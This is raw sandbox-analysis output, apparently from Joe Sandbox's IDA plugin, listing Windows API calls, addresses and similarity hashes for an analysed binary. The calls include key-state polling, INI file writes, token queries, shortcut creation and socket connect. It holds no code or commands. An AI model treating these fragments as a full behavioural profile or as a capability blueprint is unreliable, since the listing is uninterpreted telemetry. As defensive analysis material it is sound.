                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b2546acfa677cf0dfdcc91813c89730db40552bbb343148cc5a993db30bf7dc7
                                                                        • Instruction ID: 0d931d3b6eb54445c791d59e0a97144e55e617ec6ff0a030274b4f86ee60bd4b
                                                                        • Opcode Fuzzy Hash: b2546acfa677cf0dfdcc91813c89730db40552bbb343148cc5a993db30bf7dc7
                                                                        • Instruction Fuzzy Hash: 4D41C1BA905304AFC720DB69CC49FA9BB7CEB09321F140225ED59E72E1D734AD49DB90
                                                                        APIs
                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009412B4
                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009412DD
                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0094131C
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00941341
                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00941349
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 1389676194-0
                                                                        • Opcode ID: 914c213bfd94cb6c4588e82596090f4bc2032729cf4ac322dd5b09570f43b8bd
                                                                        • Instruction ID: 14c844c9296eac7570be7e3d083fed5c538f56a15c4af88c5b6604f802e48655
                                                                        • Opcode Fuzzy Hash: 914c213bfd94cb6c4588e82596090f4bc2032729cf4ac322dd5b09570f43b8bd
                                                                        • Instruction Fuzzy Hash: 4C410C35600509DFDB01EF64C981EAEBBF5FF48314B148095E94AAB3A2DB31ED41DB51
                                                                        APIs
                                                                        • GetCursorPos.USER32(000000FF), ref: 0090B64F
                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 0090B66C
                                                                        • GetAsyncKeyState.USER32(00000001), ref: 0090B691
                                                                        • GetAsyncKeyState.USER32(00000002), ref: 0090B69F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                        • String ID:
                                                                        • API String ID: 4210589936-0
                                                                        • Opcode ID: 93d211007e79dbfd029f8f1f7c557558e6d0ede6ec2824a51b22b22001ab9439
                                                                        • Instruction ID: 231b38c4770dee2054276c78e1e1c0c460eeabce222e84d2d1a5244a2ccdde59
                                                                        • Opcode Fuzzy Hash: 93d211007e79dbfd029f8f1f7c557558e6d0ede6ec2824a51b22b22001ab9439
                                                                        • Instruction Fuzzy Hash: FA418D35A09109FFCF159F64C844AE9BBB8BF45324F204319F829A62D0CB31A994DFA1
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0092B369
                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 0092B413
                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0092B41B
                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 0092B429
                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0092B431
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePostSleep$RectWindow
                                                                        • String ID:
                                                                        • API String ID: 3382505437-0
                                                                        • Opcode ID: 87f3579472c2b02a33c669c128d625f2f54b03496ffc2933a9ea1c57a4727613
                                                                        • Instruction ID: 3c4bd37f22994b3e276fc5c9f0a43e0b85e03ddea4e5e5199d0ced6c3695be8c
                                                                        • Opcode Fuzzy Hash: 87f3579472c2b02a33c669c128d625f2f54b03496ffc2933a9ea1c57a4727613
                                                                        • Instruction Fuzzy Hash: E931E072905229EBDF04CF68ED4CA9E3BB5EF40325F004229F924A61D1C3B09954DB90
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 0092DBD7
                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0092DBF4
                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0092DC2C
                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0092DC52
                                                                        • _wcsstr.LIBCMT ref: 0092DC5C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                        • String ID:
                                                                        • API String ID: 3902887630-0
                                                                        • Opcode ID: 6f073f06838356c90804f222906fbf89813c7d502fe77efbbdbd3989d495ee16
                                                                        • Instruction ID: 0a9c07c7f567c656875c358e3d28dd51340ffe00e6e59659eaa23658a1290e73
                                                                        • Opcode Fuzzy Hash: 6f073f06838356c90804f222906fbf89813c7d502fe77efbbdbd3989d495ee16
                                                                        • Instruction Fuzzy Hash: 73212972209114BFEB259F39EC49E7B7BACDF85760F104039F80DDA195EAA5CD41D2A0
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0095DEB0
                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0095DED4
                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0095DEEC
                                                                        • GetSystemMetrics.USER32(00000004), ref: 0095DF14
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00943A1E,00000000), ref: 0095DF32
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long$MetricsSystem
                                                                        • String ID:
                                                                        • API String ID: 2294984445-0
                                                                        • Opcode ID: 3a5c872a710e7fa2300edbef0d1c9387bd8de20a0614af79bdcfaf48b1742d4c
                                                                        • Instruction ID: 29a7e6ad8160de7bf104e6e559d43c5648d38377dea2e45c07a3db7f88bf98eb
                                                                        • Opcode Fuzzy Hash: 3a5c872a710e7fa2300edbef0d1c9387bd8de20a0614af79bdcfaf48b1742d4c
                                                                        • Instruction Fuzzy Hash: 3E21B231626212AFCB308F7ADC49B6A37A8FF15336F150724FD26C61E0D73098589B80
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0092BC90
                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0092BCC2
                                                                        • __itow.LIBCMT ref: 0092BCDA
                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0092BD00
                                                                        • __itow.LIBCMT ref: 0092BD11
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow
                                                                        • String ID:
                                                                        • API String ID: 3379773720-0
                                                                        • Opcode ID: 309988fc567f408b0a6151c034125265e8489913df5d04590a62e4fe2b74dc65
                                                                        • Instruction ID: 25195e289802e2edb1535ce6e62b55647ba11e7680f1220783bf9b651912a153
                                                                        • Opcode Fuzzy Hash: 309988fc567f408b0a6151c034125265e8489913df5d04590a62e4fe2b74dc65
                                                                        • Instruction Fuzzy Hash: E321C6767006287BDB10AA69AC46FDE7BBDEF89710F500025FA45EB1C1EB70894587A1
                                                                        APIs
                                                                          • Part of subcall function 008F50E6: _wcsncpy.LIBCMT ref: 008F50FA
                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,009360C3), ref: 00936369
                                                                        • GetLastError.KERNEL32(?,?,?,009360C3), ref: 00936374
                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009360C3), ref: 00936388
                                                                        • _wcsrchr.LIBCMT ref: 009363AA
                                                                          • Part of subcall function 00936318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009360C3), ref: 009363E0
                                                                        Similarity
                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                        • String ID:
                                                                        • API String ID: 3633006590-0
                                                                        • Opcode ID: 74fba62b04f12f96dd2319ab2851976b8b6960649f7bb7abbf2ef6325092f75b
                                                                        • Instruction ID: 08cc59c44140d9ffc3cfa607f05afaed7dfa5117dbb21ef3d339e038d5e26990
                                                                        • Opcode Fuzzy Hash: 74fba62b04f12f96dd2319ab2851976b8b6960649f7bb7abbf2ef6325092f75b
                                                                        • Instruction Fuzzy Hash: EB216A31609209ABDB24AB78AC52FFA33ACEF063A0F108465F049C70C0EF64DAC18E55
                                                                        APIs
                                                                          • Part of subcall function 0094A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0094A84E
                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00948BD3
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00948BE2
                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00948BFE
                                                                        Similarity
                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 3701255441-0
                                                                        • Opcode ID: d2239ee9ac860bb901b8df28756125b830f399e0a52375e5da0a398983845a60
                                                                        • Instruction ID: 1fa76aee30b8bf2097dfabcdba0b3eb826afdb76062c156ec39d11d324bb4cfd
                                                                        • Opcode Fuzzy Hash: d2239ee9ac860bb901b8df28756125b830f399e0a52375e5da0a398983845a60
                                                                        • Instruction Fuzzy Hash: 262160722002149FDB14AF68CD86F7E77A9EF88711F044459F956EB3D2CB74AC418B51
                                                                        APIs
                                                                        • IsWindow.USER32(00000000), ref: 00948441
                                                                        • GetForegroundWindow.USER32 ref: 00948458
                                                                        • GetDC.USER32(00000000), ref: 00948494
                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 009484A0
                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 009484DB
                                                                        Similarity
                                                                        • API ID: Window$ForegroundPixelRelease
                                                                        • String ID:
                                                                        • API String ID: 4156661090-0
                                                                        • Opcode ID: 4a0a69438ee922348b4baa74874b160624b72521da9c879f275a3312fc2b328b
                                                                        • Instruction ID: ec303ea11ec74cf7af14cbd0dea7d6f167885b9e3faa8c1f0295ae3c0f6fa47c
                                                                        • Opcode Fuzzy Hash: 4a0a69438ee922348b4baa74874b160624b72521da9c879f275a3312fc2b328b
                                                                        • Instruction Fuzzy Hash: A5218476A00204AFD704EFA4C845A6EB7F5EF88301F148879F95997251DB70AD40DB90
                                                                        APIs
                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0090AFE3
                                                                        • SelectObject.GDI32(?,00000000), ref: 0090AFF2
                                                                        • BeginPath.GDI32(?), ref: 0090B009
                                                                        • SelectObject.GDI32(?,00000000), ref: 0090B033
                                                                        Similarity
                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                        • String ID:
                                                                        • API String ID: 3225163088-0
                                                                        • Opcode ID: 239ba28364d8cbe091ba80bdeacd41070407738be633e9b7dcc2ea8a13c66b55
                                                                        • Instruction ID: 11158ea56fcc8a991b29c0de6e9b3aeaeab3e8f7159ea1b038ac0f95ceab05fa
                                                                        • Opcode Fuzzy Hash: 239ba28364d8cbe091ba80bdeacd41070407738be633e9b7dcc2ea8a13c66b55
                                                                        • Instruction Fuzzy Hash: 7A21C2B2828305EFDB10DF54ED58BAA7B7CBB10365F54432AF424A21E0D3704881EF90
                                                                        APIs
                                                                        • __calloc_crt.LIBCMT ref: 009121A9
                                                                        • CreateThread.KERNEL32(?,?,009122DF,00000000,?,?), ref: 009121ED
                                                                        • GetLastError.KERNEL32 ref: 009121F7
                                                                        • _free.LIBCMT ref: 00912200
                                                                        • __dosmaperr.LIBCMT ref: 0091220B
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        Similarity
                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                        • String ID:
                                                                        • API String ID: 2664167353-0
                                                                        • Opcode ID: 75cd3be89f25784677113f32e4c422258dd44fcff55a100c5eb77f9358fc35bb
                                                                        • Instruction ID: b4f4a6be6496095b3f4a593dbc9a51b25c1df3c4601294d9119eebd8bb572cbd
                                                                        • Opcode Fuzzy Hash: 75cd3be89f25784677113f32e4c422258dd44fcff55a100c5eb77f9358fc35bb
                                                                        • Instruction Fuzzy Hash: D611E53330830E6F9B15BFA49C41EEF7BA8EF857607100429F92886141DB3198E186A0
                                                                        APIs
                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0092ABD7
                                                                        • GetLastError.KERNEL32(?,0092A69F,?,?,?), ref: 0092ABE1
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,0092A69F,?,?,?), ref: 0092ABF0
                                                                        • HeapAlloc.KERNEL32(00000000,?,0092A69F,?,?,?), ref: 0092ABF7
                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0092AC0E
                                                                        Similarity
                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 842720411-0
                                                                        • Opcode ID: 10e6a5e29c954e1d027883e7ba70e6837ea1385a415960e1a9e418370090ad29
                                                                        • Instruction ID: 8cd24b1081fd87f00cb4a25591cafb8521120df08302e09785940c66362c255c
                                                                        • Opcode Fuzzy Hash: 10e6a5e29c954e1d027883e7ba70e6837ea1385a415960e1a9e418370090ad29
                                                                        • Instruction Fuzzy Hash: 99013C72219214BFDB148FA9EC48DAB3BBDEF8A7557100429F949D3260DA71DC80DF61
                                                                        APIs
                                                                        • CLSIDFromProgID.OLE32 ref: 00929ADC
                                                                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 00929AF7
                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 00929B05
                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00929B15
                                                                        • CLSIDFromString.OLE32(?,?), ref: 00929B21
                                                                        Similarity
                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 3897988419-0
                                                                        • Opcode ID: de5d0a39919787420e1013febce0b2b94d14cf7e76a56f72504f5d0327afbb1a
                                                                        • Instruction ID: 43bde65ade5953db1befec87b04faacccca3e0b1210bd841540d10bac9771328
                                                                        • Opcode Fuzzy Hash: de5d0a39919787420e1013febce0b2b94d14cf7e76a56f72504f5d0327afbb1a
                                                                        • Instruction Fuzzy Hash: 5B01A276A11228BFDB104F54FC44B9A7BFDEF48351F144028F909D2210D771DD40ABA0
                                                                        APIs
                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00937A74
                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00937A82
                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00937A8A
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00937A94
                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00937AD0
                                                                        Similarity
                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                        • String ID:
                                                                        • API String ID: 2833360925-0
                                                                        • Opcode ID: 060a07e3ab33f1040ffe9ca59cc332061b69ab4b1e81684de3fe972e164acf18
                                                                        • Instruction ID: bbeee544bec0cc48205181d30c5b87689101a3d0ab6a0a8aefac1030059e383d
                                                                        • Opcode Fuzzy Hash: 060a07e3ab33f1040ffe9ca59cc332061b69ab4b1e81684de3fe972e164acf18
                                                                        • Instruction Fuzzy Hash: 2B0135B6C09619EBDF14ABE4DC49AEDFB78FF08311F400445E402F2250DB3096909BA1
                                                                        APIs
                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0092AADA
                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0092AAE4
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0092AAF3
                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0092AAFA
                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0092AB10
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: 6fa6885ae4cc1bada33a72812f30077341c48cb51553f847eeb3dca4b4968083
                                                                        • Instruction ID: a1afeeb6f009a5bac2ccee4f242627792587fc7efec785afd24e70099274d876
                                                                        • Opcode Fuzzy Hash: 6fa6885ae4cc1bada33a72812f30077341c48cb51553f847eeb3dca4b4968083
                                                                        • Instruction Fuzzy Hash: C9F04F72215318AFEB110FA4EC88E673B7DFF46754F100029F945D7190CA619841DA61
                                                                        APIs
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0092AA79
                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0092AA83
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0092AA92
                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0092AA99
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0092AAAF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: a16848cfc0b66fff7fbd7598294a2a19e6aa66a33f67d3af82ac8a94b0294545
                                                                        • Instruction ID: f95735e778d80599745a5e3bcb2f0d0e4a138b70a187e78e65973ecb519a1b39
                                                                        • Opcode Fuzzy Hash: a16848cfc0b66fff7fbd7598294a2a19e6aa66a33f67d3af82ac8a94b0294545
                                                                        • Instruction Fuzzy Hash: 47F0C232215314AFEB101FA4EC88E673BBDFF49754F000429F905D7190DB609C82DB61
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0092EC94
                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0092ECAB
                                                                        • MessageBeep.USER32(00000000), ref: 0092ECC3
                                                                        • KillTimer.USER32(?,0000040A), ref: 0092ECDF
                                                                        • EndDialog.USER32(?,00000001), ref: 0092ECF9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 3741023627-0
                                                                        • Opcode ID: 6080e1981252dbc8c61017a2a7c89cea1bbb3196e1ff4e7aa783e7817a4885fc
                                                                        • Instruction ID: bf707faac23e6bd258f0bef3266304ab1ed0b862030026ad868a295aed74722e
                                                                        • Opcode Fuzzy Hash: 6080e1981252dbc8c61017a2a7c89cea1bbb3196e1ff4e7aa783e7817a4885fc
                                                                        • Instruction Fuzzy Hash: 61018131514724ABEB249B60EE9EB9677B8FF00705F000559B686A14E4DBF4AA84DB80
                                                                        APIs
                                                                        • EndPath.GDI32(?), ref: 0090B0BA
                                                                        • StrokeAndFillPath.GDI32(?,?,0096E680,00000000,?,?,?), ref: 0090B0D6
                                                                        • SelectObject.GDI32(?,00000000), ref: 0090B0E9
                                                                        • DeleteObject.GDI32 ref: 0090B0FC
                                                                        • StrokePath.GDI32(?), ref: 0090B117
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                        • String ID:
                                                                        • API String ID: 2625713937-0
                                                                        • Opcode ID: 2e5b354c69be864f753f7e6bf24448662f5aee548f5c32abc706a994ce1b7b1f
                                                                        • Instruction ID: b40d19981223a1a7c33965f96672111b9377fc02a41ac0b2eaca5b06b13ea96e
                                                                        • Opcode Fuzzy Hash: 2e5b354c69be864f753f7e6bf24448662f5aee548f5c32abc706a994ce1b7b1f
                                                                        • Instruction Fuzzy Hash: F7F0F23202D208EFDB219F69EE187A43B78BB00372F888314E429840F0C73089A6EF50
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 0093F2DA
                                                                        • CoCreateInstance.OLE32(0097DA7C,00000000,00000001,0097D8EC,?), ref: 0093F2F2
                                                                        • CoUninitialize.OLE32 ref: 0093F555
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                        • String ID: .lnk
                                                                        • API String ID: 948891078-24824748
                                                                        • Opcode ID: 07b58d0d4ac93496ef709e432ff22a07b161dc638e7a1e2399de13d72bf8f7ea
                                                                        • Instruction ID: 7f91483ba4960837d9db74217d91ea454d2e72151314c6318ac105deb32bf9f0
                                                                        • Opcode Fuzzy Hash: 07b58d0d4ac93496ef709e432ff22a07b161dc638e7a1e2399de13d72bf8f7ea
                                                                        • Instruction Fuzzy Hash: C1A11A71104205AFD300EF68C895EABB7A8FF98714F00495DF695D7192EB70EA49CB92
                                                                        APIs
                                                                          • Part of subcall function 008F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F53B1,?,?,008F61FF,?,00000000,00000001,00000000), ref: 008F662F
                                                                        • CoInitialize.OLE32(00000000), ref: 0093E85D
                                                                        • CoCreateInstance.OLE32(0097DA7C,00000000,00000001,0097D8EC,?), ref: 0093E876
                                                                        • CoUninitialize.OLE32 ref: 0093E893
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                        • String ID: .lnk
                                                                        • API String ID: 2126378814-24824748
